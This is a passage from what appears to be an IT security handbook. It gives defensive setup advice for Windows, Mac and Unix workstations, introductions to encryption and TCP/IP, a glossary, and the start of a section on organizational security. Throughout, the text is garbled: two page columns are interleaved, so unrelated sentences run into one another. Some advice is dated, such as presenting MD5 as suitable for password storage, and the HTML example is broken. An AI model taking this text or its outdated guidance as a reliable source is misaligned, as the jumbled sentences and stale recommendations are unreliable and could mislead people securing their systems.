of view, Windows is not quite distribute them locally on CD. Although it as attractive. The core operating system was not takes significant resources, a Windows originally written with either network connectivity Update-like service called Software Update or security in mind. The more recent versions (Windows Services can be run on a local site for 2000, Windows XP, and later) have addressed many of the Windows 2000 systems: original concerns, but security is still lacking and the (http://www.microsoft.com/windows2000/windowsupdate/sus/). current changes are of little help to users who are still running older systems. Until recently, Microsoft Accounts For Windows NT, 2000, and XP which did not have a strong focus on security, although support multiple users, you should ensure that is changing, particular with the media attention that there are no unnecessary user on bugs and other exploitable flaws in Microsoft accounts set up. In addition, make sure operating systems. that all users choose robust passwords, as described earlier in Part 2 of this The built-in functionality of their systems and applications Handbook. Users should only be given the has often been enhanced at the expense of security. In privileges that they require. For example, many cases, to make things easy for the novice user, sys- even if a machine is administered by its' tems are delivered with many sub-systems and capabilities primary user, the user's basic operational enabled, which makes them available for exploitation. Due account should not have administrator to the prevalence of these exposures and the number of privileges. installed computers, the Windows-based PC has become a major target of malicious programmers who have churned File If you do not use file sharing or out viruses, worms, and Trojans by the tens of thousands. Sharing print serving, make sure that the capability The Windows GUI (graphical user interface) is sufficiently is completely disabled. The procedure can user-friendly that the system is now used by millions be found in Windows Help or within the of people with little technical knowledge or interest. Microsoft support site; search for "disable This type of user base, coupled with the vulnerabilities file sharing XX" where XX is the version of cited above, has made Windows-based systems prone your system, such as XP or 2000. If you do to security problems. allow file sharing, make sure you give out no more privileges than necessary. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 69 File The FAT and FAT32 file systems historically Security If you are a non-technical user System used by Windows cannot be properly Review with no support organization secured, particularly if you are using file available to help you, take a look sharing. The NTFS file system should be at Microsoft's recommendations used whenever possible, if there is any for home users: network file access. Note that NTFS can http://www.microsoft.com/security/home not be used in some cases where you have or http://www.microsoft.com/protect/. a dual-boot machine or need to access the hard disk from another operating system. If you are an IT professional, go to: http://www.microsoft.com/technet/security. P Systems Some systems come with all services If you have a newer system, consider ART Services enabled in order to allow sophisticated running the Microsoft Baseline Security computer-to-computer communications. Analyzer (MBSA) that covers Windows If you are not in a corporate network, 2000 and XP systems. disable the services that you do not need. TW Macintosh Firewalls Install a software or hardware O firewall. Free software versions Strengths and vulnerabilities are available. Keep the firewall up-to-date. Make sure that the Historically, the Apple Macintosh computer and operat- firewall is configured to warn you ing system has been far less prone to security problems if unusual activities are taking place. that the Windows PC. Moreover, since there are far fewer Mac users than there are PC users, malicious attackers Anti-virus Install anti-virus software. If you cannot have not been as interested in targeting them. Perhaps software find freeware that is kept current, you the largest vulnerability is that, for these reasons, Mac should invest in commercial software. users often think they are safe and do not bother to Some virus software companies offer take precautions. MacOS systems prior to MacOS X used dynamically downloaded free virus a proprietary operating system. MacOS X is based on the checking. Keep the virus signatures FreeBSD Unix system, and should be considered a spe- up-to-date; some vendors offer daily cialized Unix system with regard to security (see next updates, others provide weekly updates, section on Unix). For MacOS X, there are many system or longer term. The more current your services bundled within the core system, but they are virus definitions are, the better your all shipped disabled. system is protected. How to protect yourself Malware There are programs which will detectors scan your system for all sorts of Software Make sure that your system is full patched. potentially malicious software. currency Go to: http://www.apple.com and click on Pest Patrol support. As with Windows systems, there is (http://www.pestpatrol.com), a good chance that an unpatched system Lavasoft will be infiltrated within hours or days, (http://www.lavasoftusa.com/software/adawareplus/) particularly if it is permanently attached and SpybotSD to a network. (http://www.safer-networking.org) all have free programs that detect various malware. 70 INFORMATION SECURITY AND GOVERNMENT POLICIES With the recent popularity of Linux, this phenomenon Accounts Make sure that all accounts that you do has spread, partly because the system is so attractive not need are disabled or deleted. and partly because Linux is viewed as a (free) replacement In particular, make sure there are no for Windows. This latter trend is probably stronger in Guest accounts without a password. the developing world than it is in developed countries, Limit administrative privileges to accounts due to the higher relative cost of software compared to that actively need them and do not use an salaries in developing countries. Traditionally, Unix's administrative-capable account for your strengths have been its flexibility coupled with the routine work. impressive base of user and corporate-developed software that has grown over the years. File Disable file sharing if you are not using it. Sharing If you are using file sharing, make sure the Unfortunately, Unix's flexibility and power has not been privileges are granted at minimum level accompanied by a user-friendly front-end (from a novice required. user's point of view). As a result, when these systems have been used as workstations for those who do not Services Do not enable services that you do not wish to become Unix experts, strong systems support need. If you enable them temporarily, staff were needed. To some extent, this is being but will not use them often, disable them addressed, with MacOS X being the best example. when you are through. However, the foundation of the system is still complex, and there are many opportunities for a naive user to New If you install new network-oriented leave doors open for security breaches. Although Unix applications applications, particularly those originally systems have been relatively virus free, they have the designed for Unix, be aware that they may distinction of hosting some of the earliest worms and be vulnerable in ways that were uncommon Trojans; these are still major potential problems. in systems built prior to MacOS X. How to protect yourself Firewalls Install a software or hardware firewall. Keep it up-to-date. Make sure that the The following comments augment information supplied firewall is set to warn you if unusual in the rest of this Handbook. Virtually all of the items activities take place. in the preceding seven chapters apply to Unix, Linux and related systems, and must be addressed if your Anti-virus Install anti-virus software. If you cannot computer is to be moderately secure. This section focuses software find freeware that is kept current, you primarily on single-user workstations. Those responsible should invest in commercial software. for servers should read Part 5 of this Handbook. Keep the virus signatures up-to-date. The more current your virus definitions are, Multiple Unix Because there have been a variety the better your system is protected. Variants of versions of Unix-like operating systems, many pre-installed security Unix, Linux, and Related Systems mechanisms are vendor-specific. It's particularly important to read all Strengths and vulnerabilities of the manuals for your vendor's version of Unix. Several good books, Unix systems have historically been used as servers (both web sites, and mailing lists devoted for system services and for multi-user computing) and as to Unix security are listed in workstations in computer science and physical science Annexes 2-5. environments. Over the last decade, they have made some modest inroads against Windows and Macintosh systems as single-user workstations in other environments. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 71 Software It is imperative that software be System Services Many Unix systems are shipped with currency kept current, and that all security a large variety of system services patches be applied quickly. Details including FTP servers, web servers, on where to get updates and how to and mail servers. In many cases, apply them vary from system to these systems are active and system. operating by default. All network- based services that you are not User Privileges The user root (uid 0) is the using should be disabled. Some people superuser and usually has the ability feel that since the service is there, to modify every aspect of the it should be used, even though they P system. Accordingly, protecting the do not have the technical expertise ART root account and processes that run to manage it securely. This is a big with root privileges is a critical mistake and such services should not aspect of Unix security. Avoid using be run on user workstations without the root account for routine good reason and adequate support. TW activities, and disable logins by root. When you must use root, Many network services are started by O use the superuser command the inetd (or xinetd) daemon. (su, or a variation like sudo) to Examine the configuration file(s) change from your normal user used by this daemon and disable any account to root. services that you do not need. Other network services are started at If you have multiple users on your system boot by files in the system, consider using access /etc/init.d or /etc/rc*.d directories control lists of other mechanisms on in the files /etc/rc and to limit the file access that these /etc/rc.local. Disable any services users have. that you do not use. Pay particular attention to services that may When possible, run network services provide outsiders with information as a non-root user. about your system or its users, such as fingerd. Never unpack or compile new software as root. It's often possible If you run anonymous FTP services, to compile software in a chroot use an up-to-date version of the FTP environment to protect yourself daemon. Don't provide your real against some kinds of Trojan horses. /etc/passwd file in the FTP area. Make sure that /etc/ftpusers, the list Remote disk If you use some mechanism to allow of users who cannot connect by FTP, mounts remote access to your disks (whether includes at least root, uucp, bin, to other Unix systems or to PCs) use and any other account that does not robust passwords and, when possible, belong to a human being. Be wary limit access to the files that the of directory permissions and applications demand. ownership in the FTP area; configure "incoming" directories to prevent downloads and "outgoing" directories to prevent uploads. Scan your FTP logs regularly. 72 INFORMATION SECURITY AND GOVERNMENT POLICIES Firewall Every Unix system should run its own host-based packet-filtering firewall. Consult vendor documentation to determine if your system has a firewall and how to use it. Typical firewall configuration tools include ipfw, ipchains, and iptables. These firewalls should be configured to block all packets by default, and to allow only packets destined for services that you intend to provide. Default Many Unix systems come with several Accounts default accounts that are used to separate process or file ownership privileges, such as daemon, bin, uucp, etc. Make sure that the encrypted password entry for all of these accounts begins with a "*" character so that no possible password can be used to access the account. Only the root account should have a valid password. No one can log into the other accounts (although root can still assume their privileges with the su command if necessary). Malware There are a number of tools which help a detectors Unix administrator ensure that there is no malicious software on their system. One of the oldest is Tripwire, which verifies that the critical system utilities (and other files) have not been surreptitiously altered. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 73 ADDENDUM 1. We can now sent the string: INTRODUCTION TO ENCODING AND 19050321180920252709192709131615182001142028. ENCRYPTION If we put some spaces in the previous line so it is more legible, it looks like this: 19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 Encoding and Encryption are techniques that transform 20 01 14 20 28. a string of characters into some other form for a specific reason. In the sense that they are used in computing, When the message is received, the recipient does a encoding is a transformation that alters the look of the reverse translation: object, so that the result meets some specific criteria. S replaces the 19 Encryption is a transformation designed to disguise or E replaces the 05 hide the original contents. P C replaces the 03 and so forth resulting in the ART Encoding original sentence. Encoding Applications Encoding changes the format of an object to meet TW some criteria. It is a reversible process, so that the The main application of encoding that we will consider encoded format can later be decoded to recover the is the transmission of e-mail attachments. E-mail was O original object. originally designed for sending English-language text. It was based on the ASCII character set which allows The Encoding Process 128 unique characters. 128 is sufficient for representing Let us say that you want to send a message consisting the 26 letters of the English alphabet in upper and of a normal English language sentence: lower case, the 10 digits, a number of special characters SECURITY IS IMPORTANT. (such as comma, period, brackets, etc.) and a variety of However, there is a restriction that you may only send control characters (such as tab and end-of-line). the decimal digits: 0, 1, 2, 3, 4, 5, 6, 7, 8 and 9. Unfortunately, many languages include more characters To do this, we use a simple set of rules: than English. Programs, word processing files, pictures, Instead of A, send the digits 01; and many other types of files are composed of 8-bit Instead of B, send the digits 02; bytes which allow 256 unique characters. None of these Instead of C, send the digits 03; could be sent in e-mail. Instead of D, send the digits 04; Instead of E, send the digits 05; To overcome this problem, the concept of attachments ...... was developed, in which the file to be transmitted Instead of X, send the digits 24; would first be encoded so that it would only contain Instead of Y, send the digits 25; the legal ASCII characters. This process is similar to Instead of Z, send the digits 26; how our sample sentence was encoded using only digits. Instead of the space character, As with our sample, the resultant encoded message is send the digits 27; longer than the original, but it can be transmitted Instead of the period character, legally, and, when received, decoded into its original form. send the digits 28. Unicode We take the original sentence, and replace each character with its code: Unicode is a method of encoding all characters used in 19 replaces the S all commonly used languages so that computers may uni- 05 replaces the E formly handle them. Details are available through the 03 replaces the C and so forth Unicode Consortium (http://www.unicode.org), in brief: 74 INFORMATION SECURITY AND GOVERNMENT POLICIES "Fundamentally, computers just deal with numbers. A is replaced by B They store letters and other characters by assigning B is replaced by C a number for each one. Before Unicode was invented, C is replaced by D there were hundreds of different encoding systems for ...... assigning these numbers. No single encoding could X is replaced by Y contain enough characters, for example, the European Y is replaced by Z Union alone requires several different encodings to Z is replaced by A (at the end of the alphabet, cover all its languages. Even for a single language like it loops back to the beginning) English, no single encoding was adequate for all the letters, punctuation, and technical symbols in If we use this algorithm, our sample sentence becomes common use. (ignoring the space and period in this simple case): TFDVSJUZ JT JNQPSUBOU These encoding systems also conflict with one The message is now disguised. The recipient will do the another. That is, two encodings can use the same reverse translation, changing each letter by using the number for two different characters, or use different previous letter and will obtain the original sentence. numbers for the same character. Any given computer (especially a server) needs to support many different Instead of shifting each character 1 place, we could encodings, yet whenever data is passed between have shifted them some other number of characters. different encodings or platforms, that data always As long as the recipient knows the number of shifts, runs the risk of corruption. Unicode is changing they can decrypt the message. all that! The number of shifts is called the encryption key. This Unicode provides a unique number for every character, same number is used to encrypt the message, and later no matter what the platform, no matter what the decrypt it. Julius Caesar used this encryption method to program, no matter what the language. The Unicode keep messages he sent secret (he used a key of 3). Standard has been adopted by such industry leaders as Apple, HP, IBM, JustSystem, Microsoft, Oracle, SAP, With this simple algorithm, if the message is intercepted Sun, Sybase, Unisys and many others." and the interceptor understood the concept of encryption, he or she might be able to guess the contents by trying Encryption various shifts. If the algorithm was more complex than simply shifting each letter by the same amount, it Encryption is similar to encoding in that the process would be more difficult to decipher. Until recently, many transforms some original text or object into another encryption algorithms were just such shifting algorithms. form. In this case, the intent is to hide the original contents. There are three types of encryption that we will be Today, instead of shifting letters, we use mathematical looking at: formulas to encrypt messages. We still use a key and this · Symmetric Encryption key is part of the formula to perform the encryption. If you · Public-key Encryption want to decrypt the message, you need the key. If you · One-way Hash Encryption don't have the key, you could, of course, try various keys until the message made sense. If the key was restricted Symmetric Encryption to the numbers from 1 to 10, this guessing would not take very long. If it were allowed values from 1 to 100, In its simplest form, symmetric encryption is similar to it would probably take longer. Today, keys typically are encoding. The characters in the original object are 128-bit binary numbers. That is equivalent to about transformed. A very simple-minded encryption algorithm 340,000,000,000,000,000,000,000,000,000,000,000,000 (rules governing the process) is to take each alphabetic possible choices and guessing is not practical. character and replace it with 1 character higher. So: Information Technology Security Handbook SECURITY FOR INDIVIDUALS 75 Symmetrical encryption is used when it makes sense for There are two prime uses of such a code: both the sender and recipient to use the same key (that is, they need to agree to it ahead of time). It is used for Authentication You can take a long document or a encrypting messages while they are being transmitted, over program, compute the MD5 code a wireless link, for example, and for encrypting information for it, and keep the code in a on disk so that others cannot read it. In the latter case, if safe place. Later, you can go back you lose the key, the data is essentially lost! and compute the code again. If the new code is different from the Public-key Encryption original one, you will know that the document or program has been Public key encryption is similar to symmetrical encryption changed. Even a tiny change in a P with one major exception. Instead of one key, there are large document or program will ART two. A different key is used to encrypt the message result in a markedly different than is used to decrypt it. In a typical use, the first key MD5 code. is made public and anyone can learn it. If you want to send me a private message, you use my public key that I Storing passwords In many systems, when a TW have given to everyone to encrypt it. To decrypt the user sets a password, it is message, my private key (which is different from the my encrypted using MD5 (or a O public key) is needed, and I do not share that key with similar algorithm) and that anyone else. If your message is intercepted, no one else encrypted version is stored. can read it. When the user later attempts to sign on, what they enter Note that in this simple case, I cannot be sure who is again encrypted, and sent me the message, because anyone might have my compared to the one on disk. public key, but you can be reasonably sure that only If they match, you know the I can read it. password was correct. Note that it is not possible to Pubic/Private keys can also be used in reverse. In this decrypt the password if the case you encrypt the message with your private key, user forgets it ­ a new one and anyone who has your public key can decrypt it. must be set. This method is used because it never allows One-way Hash Encryption your password to be seen in its original form. You can think of a one-way Hash encryption as a Unfortunately, there is still type of public-key encryption for which no one has one problem and this is the the private key. So things can be encrypted, but not reason why one should not decrypted. It is different in that the encrypted message use passwords that are short, is typically relatively short. A common one-way hash simple, or guessable words: if encryption algorithm is called MD5. The output of the you obtain a list of encrypted MD5 algorithm is always 128 bits (16 bytes). If you passwords (from a system create a hash code for two different things, the that you broke into), it is chances are virtually zero that the two hash codes easy to encrypt all sorts of will be the same. "easy" passwords to see if the encrypted versions match those in the password table. 76 INFORMATION SECURITY AND GOVERNMENT POLICIES Digital Signatures If I want to send you a message, and ensure that you know that I was the one who sent it, I can use a combination of the encryption techniques: · I compose the message, and I use MD5 to create a hash code for the message. · I encrypt the hash code using my private key. · I send you the message, and the encrypted hash code. · You receive the message. · You decrypt the hash code using my public key, which will result in the original hash code. · You take the text of the message that I sent, and calculate an MD5 hash code from that. · If the two hash codes are identical, then you can be sure that the message has not been changed since I sent it (otherwise it would result in a different hash code) and that I was the one who sent it (otherwise my public key would not have allowed you to decrypt the original hash code. The Digital Certificates used by web browsers for secure authentication rely on digital signature techniques such as this one. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 77 ADDENDUM 2. TCP/IP stands for Internet Protocol and the Internet TCP/IP Protocol defines how the packet looks inside. The IP packet contains a number of pieces of information. Among them are: TCP/IP (Internet Protocol) is the protocol (set of rules) governing all messages sent over the Internet. Although · the size of the packet; a typical user does not need to know anything about · the IP address of the sender; TCP/IP to use the Internet, one does need an overview · the IP address where the packet is being sent; to configure firewalls and to understand some of the · the type of packet. other threats on the Internet. What follows is a very simplistic description of TCP/IP. If you are already When a packet leaves your computer, it is sent to the familiar with the TCP/IP protocol, you probably P nearest router which attempts to send it to the next ART do not need to read this chapter. router along the way to its destination. If, due to con- gestion or some other problem, the packet cannot get Internet Addressing delivered, it is simply ignored. For this reason, IP is called an unreliable protocol. Although in theory IP is TW Every device on the Internet has an IP address. In gen- unreliable, in most cases, the Internet delivers all the eral, this address uniquely defines that device, just as packets that are sent. O your mailing address on an envelope uniquely defines your home. Addresses in the current version of TCP/IP There are a number of different types of packets that can (known as IPv4) are 32-bit binary numbers, so there are be sent, but there are only two that we will look at here. 232 = 4,294,967,296 possible addresses. To make it easi- They are TCP and UDP. er to represent and remember, the 32-bit binary number is broken up into 4 8-bit sections. Because 28 = 256, TCP: Transmission Control Protocol each 8-bit section can have a value from 0 to 255. These 4 numbers are normally shown one after each TCP is the protocol that is used for most messages, other, connected by periods. So the lowest Internet including the web (HTTP), File Transfer Protocol (FTP) address is 0.0.0.0 and the highest one is and e-mail. In addition to the data being sent, the TCP 255.255.255.255. A typical IP address might be packet includes: 24.200.195.15. Devices called routers on the Internet keep track of where each IP address is and how to get to it. · a 16-bit sending port number; · a 16-bit receiving port number; Domain Name Service · sequencing information; · acknowledgement information. Because long strings of numbers are not easy to remem- ber, many computers on the Internet are given alphabetic Because a single computer typically has just one IP names (called a hostname). An example of such a name address, the port number is used to indicate what is www.infodev.org. When you enter this name into your program within the computer is sending or receiving web browser, for example, your computer sends a message the message. This is what allows you to have several to a special service called the Domain Name Service or web browser windows open on your computer and to DNS. The DNS knows how to translate alphabetic names have the pages that you request go back to the correct into numeric ones - 192.86.99.121 in this case. DNS also window. For a program to receive a TCP message, it must allows a web server to be moved to a different location be listening on the correct port. Typically, a specific on the Internet. The owner informs the DNS of the new port is used for each type of application. For instance, address, but users can still use the original hostname. a web server usually listens on port 80. When you open a browser window, it typically picks a semi-random port IP: Internet Protocol number (by convention higher than 1023) as its port, and this is the port that it listens on. Because IP packets When data is sent over the Internet, it is sent in blocks are limited in length, and the data transmitted by of characters called a packet or datagram. The IP in 78 INFORMATION SECURITY AND GOVERNMENT POLICIES an application program may be much larger, the data can be chopped up into smaller segments. Each segment is sent in its own TCP packet. For various reasons, some packets may arrive faster than others, which means that they may arrive out of order. The sequencing information allows the receiving program to re-assemble the seg- ments in the correct order. Since IP is potentially unreli- able, it is possible that one of the segments never arrives. In this case, the receiving program will notice that there is a gap in the sequence and it can request that the missing packet be resent. When a program sends a TCP packet, it expects the receiving program to acknowledge it. If an acknowledge- ment does not arrive in a reasonable time, the packet can be re-transmitted. Because of the sequence numbers and the acknowledgements, TCP is a reliable protocol. When it is used, the user application can be sure that if there is an error in transmission or reception, the application will be informed. UDP: User Datagram Protocol UDP is a simple format to allow data to be transmitted. Each UDP packet includes some information in addition to the data. These include: · a 16-bit sending port number, and · a 16-bit receiving port number. Just as with TCP, because port numbers are used, there can be several program sending or receiving UDP streams in parallel. Also like TCP, to receive a message, the program must be listening on the correct port. There are no provisions for sequencing or acknowledgement in UDP, so it (like IP) is an unreliable protocol. In theory, messages can be lost. It is used in cases where it either does not matter if an occasional message is lost, or if there is a simple way to recover from the lost message. Because there are no acknowledgements or sequencing, it uses far fewer resources. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 79 ADDENDUM 3. that there is sufficient spaced in memory MINI-GLOSSARY OF TECHNICAL TERMS before doing a move. Definitions Related to Security Cookie A file that is written to or read from your hard disk at the request of a remote AttachmentAn attachment is a method by which web site. The web site requests that text and images can be sent via e-mail. the file be written and reads it later. Any non-text file (which could be a As a simple example, if you tell a web site program or a picture or a video) is what your username is, it can request that converted ("encoded") into a printable this information be written to your disk. form and inserted into the text message. When you go back to that web site, it Specifically, anything stored in your P reads the cookie and knows what your ART computer is composed of zeros and ones. username is. Encoding, in its simplest form, would send the zeros and ones as printable characters. Daemon A small program that runs all of the time waiting for someone to ask it to do TW Backdoor A way to bypass the normal login security something ­ often such requests may be and gain control of a computer without made remotely over the network. O obtaining the owner's consent. If a backdoor is installed on a network-attached Denial- A Denial-of-Service attack is when computer, a person anywhere on the of-Service computers on the Internet are bombarded Internet may be able to gain control with (garbage) messages to such a great of your computer without your knowledge extent that they spend all of their time or approval. responding to these messages. Real user traffic can no longer get through. Backup The process of copying computer files to some other location either on the computer, E-mail The computer-based equivalent of postal or on storage devices that may be separated mail ­ e(lectronic)-mail. Properly from the computer. Backups allow you to addressed e-mail can be sent and received recover data in the event that the originals by anyone connected to the Internet. are no longer available (for reasons ranging From the perspective of the Internet, from accidental deletion to physical all e-mail is composed of printable text damage, theft or other loss). (ASCII) messages. Buffer A software bug that occurs when a program Encryption Encryption is a way to disguise Overflow moves data into a space in memory, but information so that it cannot be read there is not enough room. The program easily, except by the intended recipient. may discard characters to try to make In the simplest case, there is a "key" in space for the new data.34 conjunction with a set of rules that is used to disguise that information. It can Destroying these characters can cause all only be read after being decrypted, and to sorts of problems, and often can allow decrypt it, you would need to know the things to happen which affect the proper "key" and the appropriate rules. integrity or security of the program. Buffer overflows can be avoided (if you are programming) by checking 34For example, the program might move 100 characters into an area that is only 80 characters long. Assume that the programmer is moving the data into an area starting at location 1001 in memory. The first 80 characters go just where they should ­ into locations 1001-1080, but the last 20 characters go into locations 1081-1100 ­ they overlap on top of whatever was there before (since the maximum move was supposed to be just 80 characters). 80 INFORMATION SECURITY AND GOVERNMENT POLICIES Firewall Firewalls can block transmissions between Open Programs that are distributed in source you and the outside world that are Source format under conditions that allow free unexpected or disallowed. Firewalls have modification and distribution. Since the two forms: a firewall may be software source code is available, people can see program running on your computer or it how it works and are able to change it. may be a separate piece of hardware that The authors of Open Source programs watches what is being sent and received often encourage other programmers to over a network. participate in the further development of the programs. Open Source also includes HTML HTML is short for HyperText Markup software that is given away for free and Language. A mark-up language allows many Open Source programs, both free and commands or instructions embedded in the for sale, offer functionality that is similar text to be displayed and printed. It is to proprietary programs that may costs a essentially a set of instructions that tells a substantial amount of money. Sometimes web browser or mail program how to Open Source programs are incorporated display text and images. It can also give into fee-based programs in special other instructions to the browser/mail licensing arrangements. program. An example of a mark-up See www.opensource.org and language is: www.fsf.org for additional information. This sentence is <>very<> short. Spam Advertising or other e-mail sent to you without your requesting it. When the sentence is displayed, the words within the << >> are taken as instructions URL Universal Resource Locator ­ a generalized on what to do. As a result, the sentence address to locate something in the would be displayed as: This sentence is Internet. Examples are very short. http://www.infodev.org/ and mailto: Identity Identity theft occurs when someone security-handbook@worldbank.org theft gathers enough information about you to convince others (such as banks, stores or Username/ A name and a secret password that governments) that they are you. password identifies a user to a computer system or a web site. Keyboard A program that captures everything that is logger typed on a keyboard. The data can be Virus The term "virus" has a very specific written to disk or sent to someone else meaning that will be defined and via the Internet. If a keyboard logger is discussed in more detail later. For the installed on a computer, everything that is present, it will be used to describe a entered on the computer, including family of programs (including viruses, usernames and passwords, can be worms and Trojans) that can unexpectedly captured, just as if someone was looking show up in your computer, may spread to over your shoulder while you typed! other computers, and can do significant harm. This harm includes, but is not limited to, destroying files and data. 81 P A R T T H R E E S E C U R I T Y F O R O R G A N I Z A T I O N S CHAPTER 1. INTRODUCTION CHAPTER 2. OVERVIEW OF E-SECURITY RISK MITIGATION CHAPTER 3. RISK EVALUATION AND LOSS ANALYSIS CHAPTER 4. PLANNING YOUR SECURITY NEEDS CHAPTER 5. ORGANIZATIONAL SECURITY POLICY AND PREVENTION CHAPTER 6. PERSONNEL SECURITY CHAPTER 7. SECURITY OUTSOURCING CHAPTER 8. PRIVACY POLICIES LEGISLATION, AND GOVERNMENT REGULATION CHAPTER 9. COMPUTER CRIME CHAPTER 10. MOBILE RISK MANAGEMENT CHAPTER 11. BEST PRACTICES: BUILDING A SECURITY CULTURE CHAPTER 12. GENERAL RULES FOR COMPUTER USERS CHAPTER 13. GLOBAL DIALOGUES ON SECURITY 82 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 1. These organizations are typically Fortune 1000 companies INTRODUCTION with substantial financial and personnel resources available to tackle challenging security-related issues. Even so, As we have seen in Part 2, much can be done by - More than 34% of organizations rate themselves as individual users to secure their computers and the data less than adequate in their ability to determine stored on them. In small organizations, provisions for IT whether their systems are currently under attack. security may also be quite simple, with each person - More than 33% of organizations say they are holding responsibility for his or her own computer and inadequate in their ability to respond to incidents. files. However, for somewhat larger groups, groups that - Only 34% of organizations claim to be compliant are engaged in commercial transactions, or groups that with applicable security-driven regulations. maintain confidential data for customers or public - 56% of organizations cite insufficient budget as citizens, the need to establish formal security policies the number one obstacle to an effective information and procedures becomes more important. When managers security posture. and their staff consider the issue of IT security, whether - Nearly 60% of organizations say they rarely or never they are operating businesses, non-profit organizations, or calculate return on investment for information government agencies, they will all have similar concerns. security spending. Each group will want a certain level of security for their - Only 29% of organizations list employee awareness data, procedures that are clear and easy for employees to and training as a top area of information security follow, the ability to retain and build on knowledge of spending, compared with 83% of organizations that customer needs, and an understanding of how their list technology as their top information security security policy is faring in a given operational spending area. environment. In addition to these general needs, - Only 35% of organizations say they have continuous each type of organization has special concerns related education and awareness programs. to its mission and goals. Managers must emphasize information security policies in the appropriate context These statistics illustrate the fact that all organizations, in order to pursue stated objectives effectively. It is no matter how large and seemingly well-off, feel the also important to understand the costs involved with pressures, both psychological and financial, that come implementing good security practices. Security procedures from threats to IT security. The chapters to follow will and technologies are an investment and should be focus on the priorities and concerns of small to medium evaluated against the costs of potential losses; the sized organizations. However, it may be useful to keep practical recommendations in Part 3 are provided with the Ernst and Young survey in mind as a symbol of the an understanding of the rigorous cost-benefit analysis challenges faced in a range of business environments. that is necessary in a resource-constrained environment. Some Statistics on IT Security in Small and Medium-Sized Businesses 36 Organizations If you are running a small or medium sized business, your top priorities are profitability, business continuity, Ernst & Young's Global Information Security Survey 200335 sustainability, and customer service. SMEs are also reveals that 90% of organizations say information security bound by local, regional, or national laws and may be is of high importance for achieving their overall objectives. accountable to a range of authorities, depending on the 78% of organizations identify risk reduction as their top business that they are engaged in and the country's influencer for information security spending. 35http://www.ey.com/global/download.nsf/International/TSRS_-_Global_Information_Security_Survey_2003/$file/TSRS_- _Global_Information_Security_Survey_2003.pdf 36The definition of a small to medium sized enterprise will vary from country to country. In some cases, a single owner will run every aspect of a traditional business such as a farm stand or a grocery store; the owner may be the business's sole employee. In other cases, a few hundred people may be involved in a more complex enterprise focusing on consumer or technology products. In the developed world, technology based startups are considered SMEs, but they may receive substantial funding from investment groups, grown rapidly, and ultimately be acquired by large corporations. Some highly successful SMEs issue stock and become large, publicly owned corporations themselves. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 83 overall business environment. Security will be Government Agencies focused on protecting the enterprise and its customers from fraud and costly malicious attacks on In government agencies, IT deployments may be their systems and services. In addition to computer assessed in terms of efficiency, ease-of-use, and ability crime and network security, data protection is also to link up with other departments and agencies as important to SMEs and encompasses two main areas: needed. While profitability is generally not relevant in enterprise data protection from corporate spies or the governmental context, like non-profits, there are attackers and customer data protection, including often budget controls that limit the agency's ability to credit card and transaction information.37 acquire the latest in hardware and software security. At the same time, governments must be keenly focused on Non-profit Organizations data protection in targeted environment, as their data- bases contain sensitive information on individuals, In non-profit organizations, your managers and including personal identification, health, criminal, and employees are focused on effectiveness in the field, tax records. coordination with communities and partners, and reputation. Systems may be widely disbursed and Unfortunately, even in industrialized countries, data are often of lesser quality due to the budget constraints protection in government agencies lags behind and suffers present in the non-profit world. In addition, the staff from antiquated systems, inadequate funding, and over- may be less experienced with technology and thus worked staff who lack core competencies in IT security. will be facing a substantial challenge as they seek to Like businesses and non-profits, the government must be P provide uninterrupted service to their constituencies concerned with its public image after hacking incidents or ART and maintain a positive image to their donors, other security breaches are brought to light in the media. overseers, and peers. SMEs - Engines of Growth Universities THREE In a recent report on IT in developing countries, As with non-profits, budget constraints, disbursed the UNDP outlined some of the promises and challenges networks, and a wide range of technological skill are facing individuals and organizations in the information present in university systems. Universities may face age.38 The World Bank has been producing a series a greater number of internal threats as students may of reports on specific topics in information technology find hacking the institutional system an engaging development and deployment.39 Although the enterprise pastime. In addition, universities may be operating technology experiences in the industrialized world under a unique set of internal policies and also need are different in some ways (scale, costs, knowledge to comply with government regulations. In the university base of the personnel), there are some lessons to be environment, personal data protection is extremely drawn from their strengths and weaknesses in the important, as student files include much sensitive infor- area of IT security. Large enterprises are fewer, mation including identification numbers, health records, have specialized capabilities, and deeper pockets. and academic transcripts. Potential attackers could However, there are still tensions between Chief steal, modify, or destroy such data, causing serious Security Officers as managers of cost centers, damage to the credibility and effectiveness of the Chief Financial Officers as cost controllers, university system. and other branches of the organization 37In general, corporate spies are a concern in larger enterprises, or enterprises that are producing high tech products, where the intellectual property (patents) may have value if stolen. For enterprises engaged in commerce, eavesdroppers may be of greater concern than spies, though the actions they take are similar. In particular, a company should protect its accounting records, personnel information, and credit card transaction data safe from unauthorized access. 38See The Human Development Report 2001: Making New Technologies Work for Human Development" (UNDP: NY, 2001). 39See references at the World Bank site: www.worldbank.org and also research projects and products available at the IT Governance Institute (ITGI): www.itgi.org. 84 INFORMATION SECURITY AND GOVERNMENT POLICIES (Chief Information Officers, Sales and Marketing, security risks for that customer's data and equipment production).40 Without an overarching mandate to and by providing digital content and a means of create a secure IT environment, each group could communication, the ISP is subject to state and federal develop an approach to security that is driven by its regulation. If one adds the capacity for e-commerce, own mission, goals, and operational targets. While these the potential gains and attendant liabilities are varied approaches might lead to some areas being substantial over-secured and other being under-secured, clear communication from top-level management will emphasize The Risks of Blended Threats 41 that sound security practices are aligned with the well being of the organization. The technology policies and Survey data from a range of respected sources illustrates implementations required to operate a safe and secure an increase in the use of malicious code for egregious system for the enterprise are a necessary part of meeting criminal purposes. Multiple reports generated in 2002 core business objectives effectively. pertained to such things as: identity theft related to malicious code, web site defacements stemming from Small and medium sized enterprises have fewer resources political motives, distributed denial of service attacks to deploy, a flatter management hierarchy, and heavier against specific organizational targets, and so on. reliance on the knowledge base of all employees. In Furthermore, the proliferation of blended threats poses SMEs, the business processes may be more transparent serious risks for everyone on the Internet. These risks than those in a larger organization and there are special are not confined to a particular area, but threaten the security risks inherent in a structure where so much cor- entire global network. For example, the Klez worm family porate information is out in the open, for all employees appears to have originated in Asia, with authorship to see. In businesses that are not focused on technology, attributions suspected in either China or Hong Kong. there may be vulnerabilities to an employee or consult- Asian countries are currently acquiring and making ant who is more technologically savvy than the company use of Internet connected computers at a rapid pace. 